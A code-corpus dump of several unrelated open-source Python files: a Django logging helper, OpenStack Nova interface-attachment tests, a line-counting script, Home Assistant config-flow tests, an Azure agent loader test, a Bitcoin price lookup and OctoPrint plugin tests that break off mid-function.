unittest.main() | rizen1892/SmartHomeSolutions-Web | app/motion_tests.py | Python | gpl-2.0 | 112 |
# -*- coding: utf-8 -*-
import atexit
import logging
import logging.handlers
from threading import Lock
import inspect
import sys
from django.db.models import Model
from types import ModuleType
import six
logger_cache = {}
logger_cache_lock = Lock()
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
class LogWrapperForObject(object):
"""This class masks the logger in order to print out the id of the object to identify it.
Args:
logger: The logger to mask
o: The object that the logger was made for
id: If the object is not likely to provide ``pk`` on its own, then pass something here
"""
WRAPPED_FIELDS = ["trace", "debug", "info", "warning", "error", "exception"]
def __init__(self, logger, o, id=None):
self._logger = logger
self._o = o
self._id = id
def __getattr__(self, attr):
if attr not in self.WRAPPED_FIELDS:
raise AttributeError("Could not find {}".format(attr))
result = getattr(self._logger, attr)
def _log(s, *args, **kwargs):
if self._id is not None:
s = "[{}] {}".format(self._id, s)
elif hasattr(self._o, "pk"):
s = "[{}] {}".format(self._o.pk, s)
else:
s = "[{}] {}".format(str(self._o), s)
return result(s, *args, **kwargs)
return _log
def create_logger(o, additional_id=None):
"""Creates a logger that has its filename derived from the passed object's properties.
The logger is targeted at the logserver.
Args:
o: Object to create logger for.
additional_id: If the object does not provide ``pk``, then you can pass this parameter.
Returns:
Instance of logger.
"""
wrap = None
if isinstance(o, six.string_types):
if o in sys.modules:
# str -> module
return create_logger(sys.modules[o], additional_id)
logger_name = o
elif isinstance(o, ModuleType):
module_name = o.__name__
logger_name = module_name
if additional_id is not None:
wrap = LogWrapperForObject
else:
module_name = o.__module__
try:
o_name = o.__name__
except AttributeError:
o_name = type(o).__name__
logger_name = "{}.{}".format(module_name, o_name)
if isinstance(o, Model) or (inspect.isclass(o) and issubclass(o, Model)):
wrap = LogWrapperForObject
with logger_cache_lock:
if None not in logger_cache:
logger = logging.getLogger()
logger.setLevel(logging.INFO)
socket_handler = logging.handlers.SocketHandler(
"localhost", logging.handlers.DEFAULT_TCP_LOGGING_PORT)
atexit.register(socket_handler.close)
logger.addHandler(socket_handler)
logger_cache[None] = logger
if logger_name not in logger_cache:
logger_cache[logger_name] = logging.getLogger(logger_name)
result = logger_cache[logger_name]
if wrap:
return wrap(result, o, additional_id)
else:
return result
| RedHatQE/cfme_tests | sprout/sprout/log.py | Python | gpl-2.0 | 3,202 |
# Copyright 2012 SINA Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from nova.api.openstack.compute.contrib import attach_interfaces \
as attach_interfaces_v2
from nova.api.openstack.compute.plugins.v3 import attach_interfaces \
as attach_interfaces_v21
from nova.compute import api as compute_api
from nova import exception
from nova.network import api as network_api
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_network_cache_model
from webob import exc
CONF = cfg.CONF
FAKE_UUID1 = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
FAKE_UUID2 = 'bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb'
FAKE_PORT_ID1 = '11111111-1111-1111-1111-111111111111'
FAKE_PORT_ID2 = '22222222-2222-2222-2222-222222222222'
FAKE_PORT_ID3 = '33333333-3333-3333-3333-333333333333'
FAKE_NOT_FOUND_PORT_ID = '00000000-0000-0000-0000-000000000000'
FAKE_NET_ID1 = '44444444-4444-4444-4444-444444444444'
FAKE_NET_ID2 = '55555555-5555-5555-5555-555555555555'
FAKE_NET_ID3 = '66666666-6666-6666-6666-666666666666'
FAKE_BAD_NET_ID = '00000000-0000-0000-0000-000000000000'
port_data1 = {
"id": FAKE_PORT_ID1,
"network_id": FAKE_NET_ID1,
"admin_state_up": True,
"status": "ACTIVE",
"mac_address": "aa:aa:aa:aa:aa:aa",
"fixed_ips": ["10.0.1.2"],
"device_id": FAKE_UUID1,
}
port_data2 = {
"id": FAKE_PORT_ID2,
"network_id": FAKE_NET_ID2,
"admin_state_up": True,
"status": "ACTIVE",
"mac_address": "bb:bb:bb:bb:bb:bb",
"fixed_ips": ["10.0.2.2"],
"device_id": FAKE_UUID1,
}
port_data3 = {
"id": FAKE_PORT_ID3,
"network_id": FAKE_NET_ID3,
"admin_state_up": True,
"status": "ACTIVE",
"mac_address": "bb:bb:bb:bb:bb:bb",
"fixed_ips": ["10.0.2.2"],
"device_id": '',
}
fake_networks = [FAKE_NET_ID1, FAKE_NET_ID2]
ports = [port_data1, port_data2, port_data3]
def fake_list_ports(self, *args, **kwargs):
result = []
for port in ports:
if port['device_id'] == kwargs['device_id']:
result.append(port)
return {'ports': result}
def fake_show_port(self, context, port_id, **kwargs):
for port in ports:
if port['id'] == port_id:
return {'port': port}
else:
raise exception.PortNotFound(port_id=port_id)
def fake_attach_interface(self, context, instance, network_id, port_id,
requested_ip='192.168.1.3'):
if not network_id:
# if no network_id is given when add a port to an instance, use the
# first default network.
network_id = fake_networks[0]
if network_id == FAKE_BAD_NET_ID:
raise exception.NetworkNotFound(network_id=network_id)
if not port_id:
port_id = ports[fake_networks.index(network_id)]['id']
if port_id == FAKE_NOT_FOUND_PORT_ID:
raise exception.PortNotFound(port_id=port_id)
vif = fake_network_cache_model.new_vif()
vif['id'] = port_id
vif['network']['id'] = network_id
vif['network']['subnets'][0]['ips'][0]['address'] = requested_ip
return vif
def fake_detach_interface(self, context, instance, port_id):
for port in ports:
if port['id'] == port_id:
return
raise exception.PortNotFound(port_id=port_id)
def fake_get_instance(self, *args, **kwargs):
return objects.Instance(uuid=FAKE_UUID1)
class InterfaceAttachTestsV21(test.NoDBTestCase):
controller_cls = attach_interfaces_v21.InterfaceAttachmentController
validate_exc = exception.ValidationError
in_use_exc = exc.HTTPConflict
not_found_exc = exc.HTTPNotFound
not_usable_exc = exc.HTTPBadRequest
def setUp(self):
super(InterfaceAttachTestsV21, self).setUp()
self.flags(auth_strategy=None, group='neutron')
self.flags(url='http://anyhost/', group='neutron')
self.flags(timeout=30, group='neutron')
self.stubs.Set(network_api.API, 'show_port', fake_show_port)
self.stubs.Set(network_api.API, 'list_ports', fake_list_ports)
self.stubs.Set(compute_api.API, 'get', fake_get_instance)
self.expected_show = {'interfaceAttachment':
{'net_id': FAKE_NET_ID1,
'port_id': FAKE_PORT_ID1,
'mac_addr': port_data1['mac_address'],
'port_state': port_data1['status'],
'fixed_ips': port_data1['fixed_ips'],
}}
self.attachments = self.controller_cls()
self.req = fakes.HTTPRequest.blank('')
@mock.patch.object(compute_api.API, 'get',
side_effect=exception.InstanceNotFound(instance_id=''))
def _test_instance_not_found(self, func, args, mock_get, kwargs=None):
if not kwargs:
kwargs = {}
self.assertRaises(exc.HTTPNotFound, func, self.req, *args, **kwargs)
def test_show_instance_not_found(self):
self._test_instance_not_found(self.attachments.show, ('fake', 'fake'))
def test_index_instance_not_found(self):
self._test_instance_not_found(self.attachments.index, ('fake', ))
def test_detach_interface_instance_not_found(self):
self._test_instance_not_found(self.attachments.delete,
('fake', 'fake'))
def test_attach_interface_instance_not_found(self):
self._test_instance_not_found(self.attachments.create, ('fake', ),
kwargs={'body': {'interfaceAttachment': {}}})
def test_show(self):
result = self.attachments.show(self.req, FAKE_UUID1, FAKE_PORT_ID1)
self.assertEqual(self.expected_show, result)
def test_show_with_port_not_found(self):
self.assertRaises(exc.HTTPNotFound,
self.attachments.show, self.req, FAKE_UUID2,
FAKE_PORT_ID1)
@mock.patch.object(network_api.API, 'show_port',
side_effect=exception.Forbidden)
def test_show_forbidden(self, show_port_mock):
self.assertRaises(exc.HTTPForbidden,
self.attachments.show, self.req, FAKE_UUID1,
FAKE_PORT_ID1)
def test_delete(self):
self.stubs.Set(compute_api.API, 'detach_interface',
fake_detach_interface)
result = self.attachments.delete(self.req, FAKE_UUID1, FAKE_PORT_ID1)
# NOTE: on v2.1, http status code is set as wsgi_code of API
# method instead of status_int in a response object.
if isinstance(self.attachments,
attach_interfaces_v21.InterfaceAttachmentController):
status_int = self.attachments.delete.wsgi_code
else:
status_int = result.status_int
self.assertEqual(202, status_int)
def test_detach_interface_instance_locked(self):
def fake_detach_interface_from_locked_server(self, context,
instance, port_id):
raise exception.InstanceIsLocked(instance_uuid=FAKE_UUID1)
self.stubs.Set(compute_api.API,
'detach_interface',
fake_detach_interface_from_locked_server)
self.assertRaises(exc.HTTPConflict,
self.attachments.delete,
self.req,
FAKE_UUID1,
FAKE_PORT_ID1)
def test_delete_interface_not_found(self):
self.stubs.Set(compute_api.API, 'detach_interface',
fake_detach_interface)
self.assertRaises(exc.HTTPNotFound,
self.attachments.delete,
self.req,
FAKE_UUID1,
'invaid-port-id')
def test_attach_interface_instance_locked(self):
def fake_attach_interface_to_locked_server(self, context,
instance, network_id, port_id, requested_ip):
raise exception.InstanceIsLocked(instance_uuid=FAKE_UUID1)
self.stubs.Set(compute_api.API,
'attach_interface',
fake_attach_interface_to_locked_server)
body = {}
self.assertRaises(exc.HTTPConflict,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_attach_interface_without_network_id(self):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
body = {}
result = self.attachments.create(self.req, FAKE_UUID1, body=body)
self.assertEqual(result['interfaceAttachment']['net_id'],
FAKE_NET_ID1)
def test_attach_interface_with_network_id(self):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
body = {'interfaceAttachment': {'net_id': FAKE_NET_ID2}}
result = self.attachments.create(self.req, FAKE_UUID1, body=body)
self.assertEqual(result['interfaceAttachment']['net_id'],
FAKE_NET_ID2)
def _attach_interface_bad_request_case(self, body):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
self.assertRaises(exc.HTTPBadRequest,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def _attach_interface_not_found_case(self, body):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
self.assertRaises(self.not_found_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_attach_interface_with_port_and_network_id(self):
body = {
'interfaceAttachment': {
'port_id': FAKE_PORT_ID1,
'net_id': FAKE_NET_ID2
}
}
self._attach_interface_bad_request_case(body)
def test_attach_interface_with_not_found_network_id(self):
body = {
'interfaceAttachment': {
'net_id': FAKE_BAD_NET_ID
}
}
self._attach_interface_not_found_case(body)
def test_attach_interface_with_not_found_port_id(self):
body = {
'interfaceAttachment': {
'port_id': FAKE_NOT_FOUND_PORT_ID
}
}
self._attach_interface_not_found_case(body)
def test_attach_interface_with_invalid_state(self):
def fake_attach_interface_invalid_state(*args, **kwargs):
raise exception.InstanceInvalidState(
instance_uuid='', attr='', state='',
method='attach_interface')
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface_invalid_state)
body = {'interfaceAttachment': {'net_id': FAKE_NET_ID1}}
self.assertRaises(exc.HTTPConflict,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
@mock.patch.object(compute_api.API, 'attach_interface',
side_effect=NotImplementedError())
def test_attach_interface_with_not_implemented(self, _mock):
body = {'interfaceAttachment': {'net_id': FAKE_NET_ID1}}
self.assertRaises(exc.HTTPNotImplemented,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_detach_interface_with_invalid_state(self):
def fake_detach_interface_invalid_state(*args, **kwargs):
raise exception.InstanceInvalidState(
instance_uuid='', attr='', state='',
method='detach_interface')
self.stubs.Set(compute_api.API, 'detach_interface',
fake_detach_interface_invalid_state)
self.assertRaises(exc.HTTPConflict,
self.attachments.delete,
self.req,
FAKE_UUID1,
FAKE_NET_ID1)
@mock.patch.object(compute_api.API, 'detach_interface',
side_effect=NotImplementedError())
def test_detach_interface_with_not_implemented(self, _mock):
self.assertRaises(exc.HTTPNotImplemented,
self.attachments.delete,
self.req, FAKE_UUID1, FAKE_NET_ID1)
def test_attach_interface_invalid_fixed_ip(self):
body = {
'interfaceAttachment': {
'net_id': FAKE_NET_ID1,
'fixed_ips': [{'ip_address': 'invalid_ip'}]
}
}
self.assertRaises(self.validate_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_fixed_ip_already_in_use(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.FixedIpAlreadyInUse(
address='10.0.2.2', instance_uuid=FAKE_UUID1)
body = {}
self.assertRaises(self.in_use_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_port_in_use(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.PortInUse(
port_id=FAKE_PORT_ID1)
body = {}
self.assertRaises(self.in_use_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_port_not_usable(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.PortNotUsable(
port_id=FAKE_PORT_ID1,
instance=fake_instance.uuid)
body = {}
self.assertRaises(self.not_usable_exc,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
@mock.patch.object(compute_api.API, 'get')
@mock.patch.object(compute_api.API, 'attach_interface')
def test_attach_interface_no_more_fixed_ips(self,
attach_mock,
get_mock):
fake_instance = objects.Instance(uuid=FAKE_UUID1)
get_mock.return_value = fake_instance
attach_mock.side_effect = exception.NoMoreFixedIps(
net=FAKE_NET_ID1)
body = {}
self.assertRaises(exc.HTTPBadRequest,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
ctxt = self.req.environ['nova.context']
attach_mock.assert_called_once_with(ctxt, fake_instance, None,
None, None)
get_mock.assert_called_once_with(ctxt, FAKE_UUID1,
want_objects=True,
expected_attrs=None)
def _test_attach_interface_with_invalid_parameter(self, param):
self.stubs.Set(compute_api.API, 'attach_interface',
fake_attach_interface)
body = {'interface_attachment': param}
self.assertRaises(exception.ValidationError,
self.attachments.create, self.req, FAKE_UUID1,
body=body)
def test_attach_interface_instance_with_non_uuid_net_id(self):
param = {'net_id': 'non_uuid'}
self._test_attach_interface_with_invalid_parameter(param)
def test_attach_interface_instance_with_non_uuid_port_id(self):
param = {'port_id': 'non_uuid'}
self._test_attach_interface_with_invalid_parameter(param)
def test_attach_interface_instance_with_non_array_fixed_ips(self):
param = {'fixed_ips': 'non_array'}
self._test_attach_interface_with_invalid_parameter(param)
class InterfaceAttachTestsV2(InterfaceAttachTestsV21):
controller_cls = attach_interfaces_v2.InterfaceAttachmentController
validate_exc = exc.HTTPBadRequest
in_use_exc = exc.HTTPBadRequest
def test_attach_interface_instance_with_non_uuid_net_id(self):
pass
def test_attach_interface_instance_with_non_uuid_port_id(self):
pass
def test_attach_interface_instance_with_non_array_fixed_ips(self):
pass
class AttachInterfacesPolicyEnforcementv21(test.NoDBTestCase):
def setUp(self):
super(AttachInterfacesPolicyEnforcementv21, self).setUp()
self.controller = \
attach_interfaces_v21.InterfaceAttachmentController()
self.req = fakes.HTTPRequest.blank('')
self.rule_name = "os_compute_api:os-attach-interfaces"
self.policy.set_rules({self.rule_name: "project:non_fake"})
def test_index_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.index, self.req, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
def test_show_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.show, self.req, fakes.FAKE_UUID, FAKE_PORT_ID1)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
def test_create_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.create, self.req, fakes.FAKE_UUID, body={})
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
def test_delete_attach_interfaces_policy_failed(self):
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.delete, self.req, fakes.FAKE_UUID, FAKE_PORT_ID1)
self.assertEqual(
"Policy doesn't allow %s to be performed." % self.rule_name,
exc.format_message())
| jeffrey4l/nova | nova/tests/unit/api/openstack/compute/contrib/test_attach_interfaces.py | Python | apache-2.0 | 20,522 |
import re
def count_linenum(filename):
total_line = 0
comment_line = 0
blank_line = 0
with open(filename) as f:
lines = f.readlines()
total_line = len(lines)
line_index = 0
# 遍历每一行
while line_index < total_line:
line = lines[line_index]
# 检查是否为注释
if line.startswith("#"):
comment_line += 1
elif re.match("\s*'''", line) is not None:
comment_line += 1
while re.match(".*'''$", line) is None:
line = lines[line_index]
comment_line += 1
line_index += 1
# 检查是否为空行
elif line == "\n":
blank_line += 1
line_index += 1
print("在%s中:" % filename)
print("代码行数:", total_line)
print("注释行数:", comment_line)
print("空行数: ", blank_line)
if __name__ == '__main__':
filename = input("please enter filename:")
count_linenum(filename)
| pythonzhichan/DailyQuestion | 7zero/question_6.py | Python | mit | 1,077 |
"""Tests for the Config Entry Flow helper."""
from unittest.mock import patch, Mock
import pytest
from homeassistant import config_entries, data_entry_flow, setup
from homeassistant.helpers import config_entry_flow
from tests.common import (
MockConfigEntry, MockModule, mock_coro, mock_integration,
mock_entity_platform)
@pytest.fixture
def discovery_flow_conf(hass):
"""Register a handler."""
handler_conf = {
'discovered': False,
}
async def has_discovered_devices(hass):
"""Mock if we have discovered devices."""
return handler_conf['discovered']
with patch.dict(config_entries.HANDLERS):
config_entry_flow.register_discovery_flow(
'test', 'Test', has_discovered_devices,
config_entries.CONN_CLASS_LOCAL_POLL)
yield handler_conf
@pytest.fixture
def webhook_flow_conf(hass):
"""Register a handler."""
with patch.dict(config_entries.HANDLERS):
config_entry_flow.register_webhook_flow(
'test_single', 'Test Single', {}, False)
config_entry_flow.register_webhook_flow(
'test_multiple', 'Test Multiple', {}, True)
yield {}
async def test_single_entry_allowed(hass, discovery_flow_conf):
"""Test only a single entry is allowed."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
MockConfigEntry(domain='test').add_to_hass(hass)
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'single_instance_allowed'
async def test_user_no_devices_found(hass, discovery_flow_conf):
"""Test if no devices found."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
flow.context = {
'source': config_entries.SOURCE_USER
}
result = await flow.async_step_confirm(user_input={})
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'no_devices_found'
async def test_user_has_confirmation(hass, discovery_flow_conf):
"""Test user requires no confirmation to setup."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
discovery_flow_conf['discovered'] = True
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
@pytest.mark.parametrize('source', ['discovery', 'ssdp', 'zeroconf'])
async def test_discovery_single_instance(hass, discovery_flow_conf, source):
"""Test we not allow duplicates."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
MockConfigEntry(domain='test').add_to_hass(hass)
result = await getattr(flow, "async_step_{}".format(source))({})
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'single_instance_allowed'
@pytest.mark.parametrize('source', ['discovery', 'ssdp', 'zeroconf'])
async def test_discovery_confirmation(hass, discovery_flow_conf, source):
"""Test we ask for confirmation via discovery."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
result = await getattr(flow, "async_step_{}".format(source))({})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'confirm'
result = await flow.async_step_confirm({})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
async def test_multiple_discoveries(hass, discovery_flow_conf):
"""Test we only create one instance for multiple discoveries."""
mock_entity_platform(hass, 'config_flow.test', None)
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_DISCOVERY}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
# Second discovery
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_DISCOVERY}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
async def test_only_one_in_progress(hass, discovery_flow_conf):
"""Test a user initialized one will finish and cancel discovered one."""
mock_entity_platform(hass, 'config_flow.test', None)
# Discovery starts flow
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_DISCOVERY}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
# User starts flow
result = await hass.config_entries.flow.async_init(
'test', context={'source': config_entries.SOURCE_USER}, data={})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
# Discovery flow has not been aborted
assert len(hass.config_entries.flow.async_progress()) == 2
# Discovery should be aborted once user confirms
result = await hass.config_entries.flow.async_configure(
result['flow_id'], {})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert len(hass.config_entries.flow.async_progress()) == 0
async def test_import_no_confirmation(hass, discovery_flow_conf):
"""Test import requires no confirmation to set up."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
discovery_flow_conf['discovered'] = True
result = await flow.async_step_import(None)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
async def test_import_single_instance(hass, discovery_flow_conf):
"""Test import doesn't create second instance."""
flow = config_entries.HANDLERS['test']()
flow.hass = hass
discovery_flow_conf['discovered'] = True
MockConfigEntry(domain='test').add_to_hass(hass)
result = await flow.async_step_import(None)
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
async def test_webhook_single_entry_allowed(hass, webhook_flow_conf):
"""Test only a single entry is allowed."""
flow = config_entries.HANDLERS['test_single']()
flow.hass = hass
MockConfigEntry(domain='test_single').add_to_hass(hass)
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'one_instance_allowed'
async def test_webhook_multiple_entries_allowed(hass, webhook_flow_conf):
"""Test multiple entries are allowed when specified."""
flow = config_entries.HANDLERS['test_multiple']()
flow.hass = hass
MockConfigEntry(domain='test_multiple').add_to_hass(hass)
hass.config.api = Mock(base_url='http://example.com')
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
async def test_webhook_config_flow_registers_webhook(hass, webhook_flow_conf):
"""Test setting up an entry creates a webhook."""
flow = config_entries.HANDLERS['test_single']()
flow.hass = hass
hass.config.api = Mock(base_url='http://example.com')
result = await flow.async_step_user(user_input={})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['data']['webhook_id'] is not None
async def test_webhook_create_cloudhook(hass, webhook_flow_conf):
"""Test only a single entry is allowed."""
assert await setup.async_setup_component(hass, 'cloud', {})
async_setup_entry = Mock(return_value=mock_coro(True))
async_unload_entry = Mock(return_value=mock_coro(True))
mock_integration(hass, MockModule(
'test_single',
async_setup_entry=async_setup_entry,
async_unload_entry=async_unload_entry,
async_remove_entry=config_entry_flow.webhook_async_remove_entry,
))
mock_entity_platform(hass, 'config_flow.test_single', None)
result = await hass.config_entries.flow.async_init(
'test_single', context={'source': config_entries.SOURCE_USER})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
coro = mock_coro({
'cloudhook_url': 'https://example.com'
})
with patch('hass_nabucasa.cloudhooks.Cloudhooks.async_create',
return_value=coro) as mock_create, \
patch('homeassistant.components.cloud.async_active_subscription',
return_value=True), \
patch('homeassistant.components.cloud.async_is_logged_in',
return_value=True):
result = await hass.config_entries.flow.async_configure(
result['flow_id'], {})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['description_placeholders']['webhook_url'] == \
'https://example.com'
assert len(mock_create.mock_calls) == 1
assert len(async_setup_entry.mock_calls) == 1
with patch('hass_nabucasa.cloudhooks.Cloudhooks.async_delete',
return_value=coro) as mock_delete:
result = \
await hass.config_entries.async_remove(result['result'].entry_id)
assert len(mock_delete.mock_calls) == 1
assert result['require_restart'] is False
| aequitas/home-assistant | tests/helpers/test_config_entry_flow.py | Python | apache-2.0 | 8,951 |
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
# Implements parts of RFC 2131, 1541, 1497 and
# http://msdn.microsoft.com/en-us/library/cc227282%28PROT.10%29.aspx
# http://msdn.microsoft.com/en-us/library/cc227259%28PROT.13%29.aspx
from tests.tools import *
from azurelinuxagent.distro.loader import get_distro
from azurelinuxagent.distro.default.distro import DefaultDistro
class TestDistroLoader(AgentTestCase):
@distros()
def test_distro_loader(self, *distro_args):
distro = get_distro(*distro_args)
self.assertNotEquals(None, distro)
self.assertNotEquals(DefaultDistro, type(distro))
if __name__ == '__main__':
unittest.main()
| nathanleclaire/WALinuxAgent | tests/distro/test_loader.py | Python | apache-2.0 | 1,259 |
# Lookup Bitcoin value from exchanges
from exchanges.bitfinex import Bitfinex
import re
def bitcoinValue(msg):
val = Bitfinex().get_current_price()
formattedVal = "$" + "{:,.2f}".format(val)
if re.search(r"(?i)moon", msg):
return "To the moon! " + formattedVal
else:
return "Bitcoin: " + formattedVal
| bhipple/brobot | currency.py | Python | gpl-3.0 | 336 |
import unittest
import mock
import ddt
import octoprint.plugin
import octoprint.plugin.core
##~~ Helpers for testing mixin type extraction
class A(object):
pass
class A_1(A):
pass
class A_2(A):
pass
class A_3(A):
pass
class A1_1(A_1):
pass
class B(object):
pass
class B_1(B):
pass
class C(object):
pass
class C_1(C):
pass
class D(object):
pass
@ddt.ddt
class PluginTestCase(unittest.TestCase):
def setUp(self):
import logging
logging.basicConfig(level=logging.DEBUG)
# TODO mock pkg_resources to return some defined entry_points
import os
self.plugin_folder = os.path.join(os.path.dirname(os.path.realpath(__file__)), "_plugins")
plugin_folders = [self.plugin_folder]
plugin_bases = [octoprint.plugin.OctoPrintPlugin]
plugin_entry_points = None
self.plugin_manager = octoprint.plugin.core.PluginManager(plugin_folders,
plugin_bases,
plugin_entry_points,
plugin_disabled_list=[],
logging_prefix="logging_prefix.")
self.plugin_manager.reload_plugins(startup=True, initialize_implementations=False)
self.plugin_manager.initialize_implementations()
def test_plugin_loading(self):
self.assertEqual(7, len(self.plugin_manager.enabled_plugins))
self.assertEqual(2, len(self.plugin_manager.plugin_hooks))
self.assertEqual(4, len(self.plugin_manager.plugin_implementations))
self.assertEqual(3, len(self.plugin_manager.plugin_implementations_by_type))
# hook_plugin
self.assertTrue("octoprint.core.startup" in self.plugin_manager.plugin_hooks)
self.assertEqual(1, len(self.plugin_manager.plugin_hooks["octoprint.core.startup"]))
# ordered hook plugins
self.assertTrue("some.ordered.callback" in self.plugin_manager.plugin_hooks)
self.assertEqual(3, len(self.plugin_manager.plugin_hooks["some.ordered.callback"]))
# TestStartupPlugin & TestMixedPlugin
self.assertTrue(octoprint.plugin.StartupPlugin in self.plugin_manager.plugin_implementations_by_type)
self.assertEqual(2, len(self.plugin_manager.plugin_implementations_by_type[octoprint.plugin.StartupPlugin]))
# TestSettingsPlugin & TestMixedPlugin
self.assertTrue(octoprint.plugin.SettingsPlugin in self.plugin_manager.plugin_implementations_by_type)
self.assertEqual(2, len(self.plugin_manager.plugin_implementations_by_type[octoprint.plugin.SettingsPlugin]))
# TestDeprecatedAssetPlugin, NOT TestSecondaryDeprecatedAssetPlugin
self.assertTrue(octoprint.plugin.AssetPlugin in self.plugin_manager.plugin_implementations_by_type)
self.assertEqual(1, len(self.plugin_manager.plugin_implementations_by_type[octoprint.plugin.AssetPlugin]))
def test_plugin_initializing(self):
def test_factory(name, implementation):
return dict(test_factory="test_factory_%s" % name)
def verify_injection_order(name, implementation):
self.assertTrue(hasattr(implementation, "_basefolder"))
return dict()
additional_injects = dict(
additional_inject="additional_inject"
)
additional_inject_factories = [test_factory, verify_injection_order]
self.plugin_manager.initialize_implementations(
additional_injects=additional_injects,
additional_inject_factories=additional_inject_factories
)
all_implementations = self.plugin_manager.plugin_implementations
self.assertEqual(4, len(all_implementations))
for name, impl in all_implementations.items():
self.assertTrue(name in self.plugin_manager.enabled_plugins)
plugin = self.plugin_manager.enabled_plugins[name]
# test that the standard fields were properly initialized
self.assertTrue(hasattr(impl, "_identifier"))
